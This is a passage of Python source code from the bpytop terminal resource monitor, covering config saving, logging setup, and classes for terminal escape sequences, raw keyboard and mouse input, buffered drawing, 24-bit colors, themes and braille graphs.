ignore new_config[net_name] = "_error_" if "cpu_sensor" in new_config and not 
new_config["cpu_sensor"] in self.cpu_sensors: new_config["cpu_sensor"] = "_error_" self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!') return new_config def save_config(self): '''Save current config to config file if difference in values or version, creates a new file if not found''' if not self.changed and not self.recreate: return try: with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f: f.write(DEFAULT_CONF.substitute(self.conf_dict)) except Exception as e: errlog.exception(str(e)) try: CONFIG: Config = Config(CONFIG_FILE) if DEBUG: errlog.setLevel(logging.DEBUG) else: errlog.setLevel(getattr(logging, CONFIG.log_level)) DEBUG = CONFIG.log_level == "DEBUG" errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}') errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}') errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}') errlog.debug(f'CMD: {" ".join(sys.argv)}') if CONFIG.info: for info in CONFIG.info: errlog.info(info) CONFIG.info = [] if CONFIG.warnings: for warning in CONFIG.warnings: errlog.warning(warning) CONFIG.warnings = [] except Exception as e: errlog.exception(f'{e}') raise SystemExit(1) if not os.path.isdir("/sys/class/power_supply"): CONFIG.show_battery = False if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7): warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!' print("WARNING!", warn) errlog.warning(warn) #? 
#? Classes ---------------------------------------------------------------------------------------->

class Term:
	"""Terminal info and commands"""
	width: int = 0
	height: int = 0
	resized: bool = False
	_w : int = 0	# last polled terminal width
	_h : int = 0	# last polled terminal height
	fg: str = "" #* Default foreground color
	bg: str = "" #* Default background color
	hide_cursor = "\033[?25l" #* Hide terminal cursor
	show_cursor = "\033[?25h" #* Show terminal cursor
	alt_screen = "\033[?1049h" #* Switch to alternate screen
	normal_screen = "\033[?1049l" #* Switch to normal screen
	clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
	mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
	mouse_off = "\033[?1002l" #* Disable mouse reporting
	mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
	mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
	winch = threading.Event()	# set by the SIGWINCH handler to wake the resize loop

	@classmethod
	def refresh(cls, *args, force: bool = False):
		"""Update width, height and set resized flag if terminal has been resized"""
		if cls.resized: cls.winch.set(); return
		cls._w, cls._h = os.get_terminal_size()
		if (cls._w, cls._h) == (cls.width, cls.height) and not force: return
		if force: Collector.collect_interrupt = True
		#* Loop until the size is stable and at least the 80x24 minimum
		while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24):
			if Init.running: Init.resized = True
			CpuBox.clock_block = True
			cls.resized = True
			Collector.collect_interrupt = True
			cls.width, cls.height = cls._w, cls._h
			Draw.now(Term.clear)
			Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
				f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
			if cls._w < 80 or cls._h < 24:
				#* Too small: show a warning box until the user grows the terminal
				while cls._w < 80 or cls._h < 24:
					Draw.now(Term.clear)
					Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
						f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ',
						f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}',
						f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}')
					cls.winch.wait(0.3)
					cls.winch.clear()
					cls._w, cls._h = os.get_terminal_size()
			else:
				cls.winch.wait(0.3)
				cls.winch.clear()
				cls._w, cls._h = os.get_terminal_size()
		#* Size settled: invalidate clickable areas and recompute box layout
		Key.mouse = {}
		Box.calc_sizes()
		if Init.running: cls.resized = False; return
		if Menu.active: Menu.resized = True
		Box.draw_bg(now=False)
		cls.resized = False
		Timer.finish()

	@staticmethod
	def echo(on: bool):
		"""Toggle input echo"""
		(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
		if on:
			lflag |= termios.ECHO # type: ignore
		else:
			lflag &= ~termios.ECHO # type: ignore
		new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
		termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)

	@staticmethod
	def title(text: str = "") -> str:
		#* Build an xterm window-title escape sequence, prefixed with $TERMINAL_TITLE when set
		out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
		if out and text: out += " "
		if text: out += f'{text}'
		return f'\033]0;{out}\a'

class Fx:
	"""Text effects
	* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
	* uncolor(string: str) : Removes all 24-bit color and returns string ."""
	start = "\033[" #* Escape sequence start
	sep = ";" #* Escape sequence separator
	end = "m" #* Escape sequence end
	reset = rs = "\033[0m" #* Reset foreground/background color and text effects
	bold = b = "\033[1m" #* Bold on
	unbold = ub = "\033[22m" #* Bold off
	dark = d = "\033[2m" #* Dark on
	undark = ud = "\033[22m" #* Dark off
	italic = i = "\033[3m" #* Italic on
	unitalic = ui = "\033[23m" #* Italic off
	underline = u = "\033[4m" #* Underline on
	ununderline = uu = "\033[24m" #* Underline off
	blink = bl = "\033[5m" #* Blink on
	unblink = ubl = "\033[25m" #* Blink off
	strike = s = "\033[9m" #* Strike / crossed-out on
	unstrike = us = "\033[29m" #* Strike / crossed-out off

	#* Precompiled regex for finding a 24-bit color escape sequence in a string
	color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")

	@staticmethod
	def trans(string: str):
		return string.replace(" ", "\033[1C")

	@classmethod
	def uncolor(cls, string: str) -> str:
		return f'{cls.color_re.sub("", string)}'

class Raw(object):
	"""Set raw input mode for device"""
	def __init__(self, stream):
		self.stream = stream
		self.fd = self.stream.fileno()
	def __enter__(self):
		#* Save current tty attributes so __exit__ can restore them
		self.original_stty = termios.tcgetattr(self.stream)
		tty.setcbreak(self.stream)
	def __exit__(self, type, value, traceback):
		termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)

class Nonblocking(object):
	"""Set nonblocking mode for device"""
	def __init__(self, stream):
		self.stream = stream
		self.fd = self.stream.fileno()
	def __enter__(self):
		self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
		fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
	def __exit__(self, *args):
		fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)

class Mv:
	"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
	@staticmethod
	def to(line: int, col: int) -> str:
		return f'\033[{line};{col}f' #* Move cursor to line, column
	@staticmethod
	def right(x: int) -> str: #* Move cursor right x columns
		return f'\033[{x}C'
	@staticmethod
	def left(x: int) -> str: #* Move cursor left x columns
		return f'\033[{x}D'
	@staticmethod
	def up(x: int) -> str: #* Move cursor up x lines
		return f'\033[{x}A'
	@staticmethod
	def down(x: int) -> str: #* Move cursor down x lines
		return f'\033[{x}B'
	save: str = "\033[s" #* Save cursor position
	restore: str = "\033[u" #* Restore saved cursor postion
	#* Single-letter aliases
	t = to
	r = right
	l = left
	u = up
	d = down

class Key:
	"""Handles the threaded input reader for keypresses and mouse events"""
	list: List[str] = []	# queue of decoded key names (max 10)
	mouse: Dict[str, List[List[int]]] = {}	# key name -> list of [x, y] clickable positions
	mouse_pos: Tuple[int, int] = (0, 0)
	#* Map of raw escape sequences (single or alternatives) to readable key names
	escape: Dict[Union[str, Tuple[str, str]], str] = {
		"\n" : "enter",
		("\x7f", "\x08") : "backspace",
		("[A", "OA") : "up",
		("[B", "OB") : "down",
		("[D", "OD") : "left",
		("[C", "OC") : "right",
		"[2~" : "insert",
		"[3~" : "delete",
		"[H" : "home",
		"[F" : "end",
		"[5~" : "page_up",
		"[6~" : "page_down",
		"\t" : "tab",
		"[Z" : "shift_tab",
		"OP" : "f1",
		"OQ" : "f2",
		"OR" : "f3",
		"OS" : "f4",
		"[15" : "f5",
		"[17" : "f6",
		"[18" : "f7",
		"[19" : "f8",
		"[20" : "f9",
		"[21" : "f10",
		"[23" : "f11",
		"[24" : "f12"
		}
	new = threading.Event()			# signals a new key/mouse event to the main loop
	idle = threading.Event()		# cleared while the reader holds stdin (blocks Draw)
	mouse_move = threading.Event()
	mouse_report: bool = False
	idle.set()
	stopping: bool = False
	started: bool = False
	reader: threading.Thread

	@classmethod
	def start(cls):
		cls.stopping = False
		cls.reader = threading.Thread(target=cls._get_key)
		cls.reader.start()
		cls.started = True

	@classmethod
	def stop(cls):
		if cls.started and cls.reader.is_alive():
			cls.stopping = True
			try:
				cls.reader.join()
			except:
				pass

	@classmethod
	def last(cls) -> str:
		#* Pop the newest queued key, or "" if queue is empty
		if cls.list: return cls.list.pop()
		else: return ""

	@classmethod
	def get(cls) -> str:
		#* Pop the oldest queued key, or "" if queue is empty
		if cls.list: return cls.list.pop(0)
		else: return ""

	@classmethod
	def get_mouse(cls) -> Tuple[int, int]:
		if cls.new.is_set():
			cls.new.clear()
		return cls.mouse_pos

	@classmethod
	def mouse_moved(cls) -> bool:
		#* Consume-and-report the mouse-move flag set by the reader thread
		if cls.mouse_move.is_set():
			cls.mouse_move.clear()
			return True
		else:
			return False

	@classmethod
	def has_key(cls) -> bool:
		return bool(cls.list)

	@classmethod
	def clear(cls):
		cls.list = []

	@classmethod
	def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
		'''Returns True if key is detected else waits out timer and returns False'''
		if cls.list: return True
		if mouse: Draw.now(Term.mouse_direct_on)
		cls.new.wait(sec if sec > 0 else 0.0)
		if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
		if cls.new.is_set():
			cls.new.clear()
			return True
		else:
			return False

	@classmethod
	def break_wait(cls):
		#* Inject a dummy key to wake any input_wait() caller
		cls.list.append("_null")
		cls.new.set()
		sleep(0.01)
		cls.new.clear()

	@classmethod
	def _get_key(cls):
		"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
		input_key: str = ""
		clean_key: str = ""
		try:
			while not cls.stopping:
				with Raw(sys.stdin):
					if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
						continue
					input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
					if input_key == "\033": #* If first character is a escape sequence keep reading
						cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
						Draw.idle.wait() #* Wait for Draw function to finish if busy
						with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
							input_key += sys.stdin.read(20)
							if input_key.startswith("\033[<"):
								_ = sys.stdin.read(1000)	# drain any queued mouse reports
						cls.idle.set() #* Report IO blocking done
					#errlog.debug(f'{repr(input_key)}')
					if input_key == "\033":
						clean_key = "escape" #* Key is "escape" key if only containing \033
					elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
						try:
							cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
						except:
							pass
						else:
							if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
								cls.mouse_move.set()
								cls.new.set()
							elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
								clean_key = "mouse_scroll_up"
							elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
								clean_key = "mouse_scroll_down"
							elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
								if Menu.active:
									clean_key = "mouse_click"
								else:
									for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
										if list(cls.mouse_pos) in positions:
											clean_key = key_name
											break
									else:
										clean_key = "mouse_click"
					elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
					else:
						for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name
							if input_key.lstrip("\033").startswith(code):
								clean_key = cls.escape[code]
								break
						else: #* If not found in escape dict and length of key is 1, assume regular character
							if len(input_key) == 1:
								clean_key = input_key
					if clean_key:
						cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
						if len(cls.list) > 10:
							del cls.list[0]
						clean_key = ""
						cls.new.set() #* Set threading event to interrupt main thread sleep
					input_key = ""
		except Exception as e:
			errlog.exception(f'Input thread failed with exception: {e}')
			cls.idle.set()
			cls.list.clear()
			clean_quit(1, thread=True)

class Draw:
	'''Holds the draw buffer and manages IO blocking queue
	* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
	* - Adding "+" prefix to name sets append to True and appends to name's current string
	* - Adding "!" suffix to name sets now to True and print name's current string
	* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
	* .now(*args) : Prints all arguments as a string
	* .clear(*names) : Clear named buffers, all if no argument
	* .last_screen() : Prints all saved buffers
	'''
	strings: Dict[str, str] = {}	# named draw buffers
	z_order: Dict[str, int] = {}	# lower z printed last (on top)
	saved: Dict[str, str] = {}		# last printed content per buffer, for redraw
	save: Dict[str, bool] = {}		# whether a buffer should be kept in saved
	once: Dict[str, bool] = {}		# buffers cleared automatically after one print
	idle = threading.Event()
	idle.set()

	@classmethod
	def now(cls, *args):
		'''Wait for input reader and self to be idle then print to screen'''
		Key.idle.wait()
		cls.idle.wait()
		cls.idle.clear()
		try:
			print(*args, sep="", end="", flush=True)
		except BlockingIOError:
			pass
			#* Retry once after the input reader releases stdin
			Key.idle.wait()
			print(*args, sep="", end="", flush=True)
		cls.idle.set()

	@classmethod
	def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
		string: str = ""
		#* "+" prefix and "!" suffix on the name are shorthand for append/now
		if name.startswith("+"):
			name = name.lstrip("+")
			append = True
		if name.endswith("!"):
			name = name.rstrip("!")
			now = True
		cls.save[name] = not no_save
		cls.once[name] = once
		if not name in cls.z_order or z != 100: cls.z_order[name] = z
		if args: string = "".join(args)
		if only_save:
			if name not in cls.saved or not append: cls.saved[name] = ""
			cls.saved[name] += string
		else:
			if name not in cls.strings or not append: cls.strings[name] = ""
			cls.strings[name] += string
			if now:
				cls.out(name)

	@classmethod
	def out(cls, *names: str, clear = False):
		out: str = ""
		if not cls.strings: return
		if names:
			#* Print only the named buffers, in z order
			for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
				if name in names and name in cls.strings:
					out += cls.strings[name]
					if cls.save[name]:
						cls.saved[name] = cls.strings[name]
					if clear or cls.once[name]:
						cls.clear(name)
			cls.now(out)
		else:
			#* Print all buffers, in z order
			for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
				if name in cls.strings:
					out += cls.strings[name]
					if cls.save[name]:
						cls.saved[name] = cls.strings[name]
					if cls.once[name] and not clear:
						cls.clear(name)
			if clear:
				cls.clear()
			cls.now(out)

	@classmethod
	def saved_buffer(cls) -> str:
		out: str = ""
		for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
			if name in cls.saved:
				out += cls.saved[name]
		return out

	@classmethod
	def clear(cls, *names, saved: bool = False):
		if names:
			for name in names:
				if name in cls.strings: del cls.strings[name]
				if name in cls.save: del cls.save[name]
				if name in cls.once: del cls.once[name]
				if saved:
					if name in cls.saved: del cls.saved[name]
					if name in cls.z_order: del cls.z_order[name]
		else:
			cls.strings = {}
			cls.save = {}
			cls.once = {}
			if saved:
				cls.saved = {}
				cls.z_order = {}

class Color:
	'''Holds representations for a 24-bit color value
	__init__(color, depth="fg", default=False)
	-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
	-- depth accepts "fg" or "bg"
	__call__(*args) joins str arguments to a string and apply color
	__str__ returns escape sequence to set color
	__iter__ returns iteration over red, green and blue in integer values of 0-255.
	* Values:  .hexa: str  |  .dec: Tuple[int, int, int]  |  .red: int  |  .green: int  |  .blue: int  |  .depth: str  |  .escape: str
	'''
	hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool

	def __init__(self, color: str, depth: str = "fg", default: bool = False):
		self.depth = depth
		self.default = default
		try:
			if not color:
				#* Empty color string -> "null" color; escape resets background only for default bg
				self.dec = (-1, -1, -1)
				self.hexa = ""
				self.red = self.green = self.blue = -1
				self.escape = "\033[49m" if depth == "bg" and default else ""
				return
			elif color.startswith("#"):
				self.hexa = color
				if len(self.hexa) == 3:
					#* 2-digit greyscale form "#FF" -> expand to "#FFFFFF"
					self.hexa += self.hexa[1:3] + self.hexa[1:3]
					c = int(self.hexa[1:3], base=16)
					self.dec = (c, c, c)
				elif len(self.hexa) == 7:
					self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
				else:
					raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
			else:
				#* Decimal form "R G B"
				c_t = tuple(map(int, color.split(" ")))
				if len(c_t) == 3:
					self.dec = c_t #type: ignore
				else:
					raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
			ct = self.dec[0] + self.dec[1] + self.dec[2]
			if ct > 255*3 or ct < 0:
				raise ValueError(f'RGB values out of range: {color}')
		except Exception as e:
			errlog.exception(str(e))
			self.escape = ""
			return
		if self.dec and not self.hexa:
			self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
		if self.dec and self.hexa:
			self.red, self.green, self.blue = self.dec
			#* SGR 38 = foreground, 48 = background, ";2;" selects 24-bit mode
			self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'

	def __str__(self) -> str:
		return self.escape

	def __repr__(self) -> str:
		return repr(self.escape)

	def __iter__(self) -> Iterable:
		for c in self.dec:
			yield c

	def __call__(self, *args: str) -> str:
		if len(args) < 1:
			return ""
		return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'

	@staticmethod
	def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
		"""Returns escape sequence to set color
		* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
		* or decimal RGB: r=0-255, g=0-255, b=0-255
		* depth="fg" or "bg"
		"""
		dint: int = 38 if depth == "fg" else 48
		color: str = ""
		if hexa:
			try:
				if len(hexa) == 3:
					c = int(hexa[1:], base=16)
					color = f'\033[{dint};2;{c};{c};{c}m'
				elif len(hexa) == 7:
					color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
			except ValueError as e:
				errlog.exception(f'{e}')
		else:
			color = f'\033[{dint};2;{r};{g};{b}m'
		return color

	@classmethod
	def fg(cls, *args) -> str:
		#* Accepts either (r, g, b) ints or a single hexadecimal string
		if len(args) > 2:
			return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
		else:
			return cls.escape_color(hexa=args[0], depth="fg")

	@classmethod
	def bg(cls, *args) -> str:
		if len(args) > 2:
			return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
		else:
			return cls.escape_color(hexa=args[0], depth="bg")

class Colors:
	'''Standard colors for menus and dialogs'''
	default = Color("#cc")
	white = Color("#ff")
	red = Color("#bf3636")
	green = Color("#68bf36")
	blue = Color("#0fd7ff")
	yellow = Color("#db8b00")
	black_bg = Color("#00", depth="bg")
	null = Color("")

class Theme:
	'''__init__ accepts a dict containing { "color_element" : "color" }'''
	themes: Dict[str, str] = {}		# theme name -> file path ("+"-prefixed for user themes)
	cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
	current: str = ""

	#* All theme color elements, initialised to the default color until a theme loads
	main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default

	#* 101-step color gradients (indexed 0-100) built per element by _load_theme()
	gradient: Dict[str, List[str]] = {
		"temp" : [],
		"cpu" : [],
		"free" : [],
		"cached" : [],
		"available" : [],
		"used" : [],
		"download" : [],
		"upload" : [],
		"proc" : [],
		"proc_color" : [],
		"process" : [],
	}

	def __init__(self, theme: str):
		self.refresh()
		self._load_theme(theme)

	def __call__(self, theme: str):
		#* Switch theme: drop old gradients and rebuild
		for k in self.gradient.keys(): self.gradient[k] = []
		self._load_theme(theme)

	def _load_theme(self, theme: str):
		tdict: Dict[str, str]
		if theme in self.cached:
			tdict = self.cached[theme]
		elif theme in self.themes:
			tdict = self._load_file(self.themes[theme])
			self.cached[theme] = tdict
		else:
			errlog.warning(f'No theme named "{theme}" found!')
			theme = "Default"
			CONFIG.color_theme = theme
			tdict = DEFAULT_THEME
		self.current = theme
		#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
		#* Fall back to related colors for elements missing from older theme files
		if not "graph_text" in tdict and "inactive_fg" in tdict:
			tdict["graph_text"] = tdict["inactive_fg"]
		if not "meter_bg" in tdict and "inactive_fg" in tdict:
			tdict["meter_bg"] = tdict["inactive_fg"]
		if not "process_start" in tdict and "cpu_start" in tdict:
			tdict["process_start"] = tdict["cpu_start"]
			tdict["process_mid"] = tdict.get("cpu_mid", "")
			tdict["process_end"] = tdict.get("cpu_end", "")
		#* Get key names from DEFAULT_THEME dict to not leave any color unset if missing from theme dict
		for item, value in DEFAULT_THEME.items():
			default = item in ["main_fg", "main_bg"]
			depth = "bg" if item in ["main_bg", "selected_bg"] else "fg"
			if item in tdict:
				setattr(self, item, Color(tdict[item], depth=depth, default=default))
			else:
				setattr(self, item, Color(value, depth=depth, default=default))
		#* Create color gradients from one, two or three colors, 101 values indexed 0-100
		self.proc_start, self.proc_mid, self.proc_end = self.main_fg, Colors.null, self.inactive_fg
		self.proc_color_start, self.proc_color_mid, self.proc_color_end = self.inactive_fg, Colors.null, self.process_start
		rgb: Dict[str, Tuple[int, int, int]]
		colors: List[List[int]] = []
		for name in self.gradient:
			rgb = { "start" : getattr(self, f'{name}_start').dec, "mid" : getattr(self, f'{name}_mid').dec, "end" : getattr(self, f'{name}_end').dec }
			colors = [ list(getattr(self, f'{name}_start')) ]
			if rgb["end"][0] >= 0:
				#* Two colors -> one 100-step ramp; three colors -> two 50-step ramps
				r = 50 if rgb["mid"][0] >= 0 else 100
				for first, second in ["start", "mid" if r == 50 else "end"], ["mid", "end"]:
					for i in range(r):
						colors += [[rgb[first][n] + i * (rgb[second][n] - rgb[first][n]) // r for n in range(3)]]
					if r == 100:
						break
				self.gradient[name] += [ Color.fg(*color) for color in colors ]
			else:
				#* Single color -> flat "gradient"
				c = Color.fg(*rgb["start"])
				self.gradient[name] += [c] * 101
		#* Set terminal colors
		Term.fg = f'{self.main_fg}'
		Term.bg = f'{self.main_bg}' if CONFIG.theme_background else "\033[49m"
		Draw.now(self.main_fg, self.main_bg)

	@classmethod
	def refresh(cls):
		'''Sets themes dict with names and paths to all found themes'''
		cls.themes = { "Default" : "Default" }
		try:
			for d in (THEME_DIR, USER_THEME_DIR):
				if not d: continue
				for f in os.listdir(d):
					if f.endswith(".theme"):
						#* User themes get a "+" name prefix to distinguish them
						cls.themes[f'{"" if d == THEME_DIR else "+"}{f[:-6]}'] = f'{d}/{f}'
		except Exception as e:
			errlog.exception(str(e))

	@staticmethod
	def _load_file(path: str) -> Dict[str, str]:
		'''Load a bashtop formatted theme file and return a dict'''
		new_theme: Dict[str, str] = {}
		try:
			with open(path, "r") as f:
				for line in f:
					#* Lines look like: theme[element]="#RRGGBB"
					if not line.startswith("theme["): continue
					key = line[6:line.find("]")]
					s = line.find('"')
					value = line[s + 1:line.find('"', s + 1)]
					new_theme[key] = value
		except Exception as e:
			errlog.exception(str(e))
		return new_theme

class Banner:
	'''Holds the bpytop banner, .draw(line, [col=0], [center=False], [now=False])'''
	out: List[str] = []
	c_color: str = ""
	length: int = 0
	#* Pre-render the banner once at class creation, colorizing block characters per line
	if not out:
		for num, (color, color2, line) in enumerate(BANNER_SRC):
			if len(line) > length: length = len(line)
			out_var = ""
			line_color = Color.fg(color)
			line_color2 = Color.fg(color2)
			line_dark = Color.fg(f'#{80 - num * 6}')
			for n, letter in enumerate(line):
				if letter == "█" and c_color != line_color:
					if 5 < n < 25: c_color = line_color2
					else: c_color = line_color
					out_var += c_color
				elif letter == " ":
					#* Replace spaces with cursor-right so the background shows through
					letter = f'{Mv.r(1)}'
					c_color = ""
				elif letter != "█" and c_color != line_dark:
					c_color = line_dark
					out_var += line_dark
				out_var += letter
			out.append(out_var)

	@classmethod
	def draw(cls, line: int, col: int = 0, center: bool = False, now: bool = False):
		out: str = ""
		if center: col = Term.width // 2 - cls.length // 2
		for n, o in enumerate(cls.out):
			out += f'{Mv.to(line + n, col)}{o}'
		out += f'{Term.fg}'
		if now: Draw.out(out)
		else: return out

class Symbol:
	#* Box drawing characters
	h_line: str = "─"
	v_line: str = "│"
	left_up: str = "┌"
	right_up: str = "┐"
	left_down: str = "└"
	right_down: str = "┘"
	title_left: str = "┤"
	title_right: str = "├"
	div_up: str = "┬"
	div_down: str = "┴"
	#* Braille characters keyed by float "left.right" where each side is 0-4 filled dots
	graph_up: Dict[float, str] = {
	0.0 : " ", 0.1 : "⢀", 0.2 : "⢠", 0.3 : "⢰", 0.4 : "⢸",
	1.0 : "⡀", 1.1 : "⣀", 1.2 : "⣠", 1.3 : "⣰", 1.4 : "⣸",
	2.0 : "⡄", 2.1 : "⣄", 2.2 : "⣤", 2.3 : "⣴", 2.4 : "⣼",
	3.0 : "⡆", 3.1 : "⣆", 3.2 : "⣦", 3.3 : "⣶", 3.4 : "⣾",
	4.0 : "⡇", 4.1 : "⣇", 4.2 : "⣧", 4.3 : "⣷", 4.4 : "⣿"
	}
	graph_up_small = graph_up.copy()
	graph_up_small[0.0] = "\033[1C"	# transparent empty cell for 1-row graphs

	graph_down: Dict[float, str] = {
	0.0 : " ", 0.1 : "⠈", 0.2 : "⠘", 0.3 : "⠸", 0.4 : "⢸",
	1.0 : "⠁", 1.1 : "⠉", 1.2 : "⠙", 1.3 : "⠹", 1.4 : "⢹",
	2.0 : "⠃", 2.1 : "⠋", 2.2 : "⠛", 2.3 : "⠻", 2.4 : "⢻",
	3.0 : "⠇", 3.1 : "⠏", 3.2 : "⠟", 3.3 : "⠿", 3.4 : "⢿",
	4.0 : "⡇", 4.1 : "⡏", 4.2 : "⡟", 4.3 : "⡿", 4.4 : "⣿"
	}
	graph_down_small = graph_down.copy()
	graph_down_small[0.0] = "\033[1C"
	meter: str = "■"
	up: str = "↑"
	down: str = "↓"
	left: str = "←"
	right: str = "→"
	enter: str = "↲"
	ok: str = f'{Color.fg("#30ff50")}√{Color.fg("#cc")}'
	fail: str = f'{Color.fg("#ff3050")}!{Color.fg("#cc")}'

class Graph:
	'''Class for creating and adding to graphs
	* __str__ : returns graph as a string
	* add(value: int) : adds a value to graph and returns it as a string
	* __call__ : same as add
	'''
	out: str
	width: int
	height: int
	graphs: Dict[bool, List[str]]	# two alternating braille buffers (see _create)
	colors: List[str]
	invert: bool
	max_value: int
	color_max_value: int
	offset: int
	current: bool	# which of the two buffers is active
	last: int		# previous data value, becomes the "left" half of the next cell
	symbol: Dict[float, str]

	def __init__(self,
width: int, height: int, color: Union[List[str], Color, None], data: List[int], invert: bool = False, max_value: int = 0, offset: int = 0, color_max_value: Union[int, None] = None): self.graphs: Dict[bool, List[str]] = {False : [], True : []} self.current: bool = True self.width = width self.height = height self.invert = invert self.offset = offset if not data: data = [0] if max_value: self.max_value = max_value data = [ min(100, (v + offset) * 100 // (max_value + offset)) for v in data ] #* Convert values to percentage values of max_value with max_value as ceiling else: self.max_value = 0 if color_max_value: self.color_max_value = color_max_value else: self.color_max_value = self.max_value if self.color_max_value and self.max_value: color_scale = int(100.0 * self.max_value / self.color_max_value) else: color_scale = 100 self.colors: List[str] = [] if isinstance(color, list) and height > 1: for i in range(1, height + 1): self.colors.insert(0, color[min(100, i * color_scale // height)]) #* Calculate colors of graph if invert: self.colors.reverse() elif isinstance(color, Color) and height > 1: self.colors = [ f'{color}' for _ in range(height) ] else: if isinstance(color, list): self.colors = color elif isinstance(color, Color): self.colors = [ f'{color}' for _ in range(101) ] if self.height == 1: self.symbol = Symbol.graph_down_small if invert else Symbol.graph_up_small else: self.symbol = Symbol.graph_down if invert else Symbol.graph_up value_width: int = ceil(len(data) / 2) filler: str = "" if value_width > width: #* If the size of given data set is bigger then width of graph, shrink data set data = data[-(width*2):] value_width = ceil(len(data) / 2) elif value_width < width: #* If the size of given data set is smaller then width of graph, fill graph with whitespace filler = self.symbol[0.0] * (width - value_width) if len(data) % 2: data.insert(0, 0) for _ in range(height): for b in [True, False]: 